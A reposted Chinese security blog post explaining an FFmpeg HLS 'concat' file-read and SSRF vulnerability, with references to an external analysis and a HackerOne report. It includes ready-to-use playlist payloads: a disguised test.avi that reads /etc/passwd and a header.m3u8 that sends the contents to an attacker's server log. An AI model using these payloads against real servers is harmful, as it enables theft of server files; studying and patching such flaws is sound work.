未加星标

FFmpeg文件读取漏洞测试及利用

字体大小 | |
[web安全 所属分类 web安全 | 发布者 店小二03 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏

经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。


FFmpeg文件读取漏洞测试及利用

看了老外写的文章,大概理解的利用方式如下:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

以上内容保存成test.avi,是用来上传到被攻击服务器的。

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.secpulse.com?

以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:


FFmpeg文件读取漏洞测试及利用

 

会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。

这个漏洞可以用来本地文件读取(返回部分内容)和SSRF。

 

具体的参考老外写的分析文章:

https://habrahabr.ru/company/mailru/blog/274855/

还有ffmpeg的说明文档:

https://www.ffmpeg.org/ffmpeg-protocols.html#concat

还有hackerone的漏洞报告

SSRF and local file read in video to gif converter

https://hackerone.com/reports/115857


FFmpeg文件读取漏洞测试及利用

 

【原文:FFmpeg文件读取漏洞测试及利用 安全脉搏整理发布】

本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师

主题: 服务器TIEDI
tags: 漏洞,header,m3u8,读取,文件,ffmpeg,com,FFmpeg,日志,内容,http,0 #EXTINF,SEQUENCE
分页:12
转载请注明
本文标题:FFmpeg文件读取漏洞测试及利用
本站链接:http://www.codesec.net/view/425703.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | web安全 | 评论(0) | 阅读(558)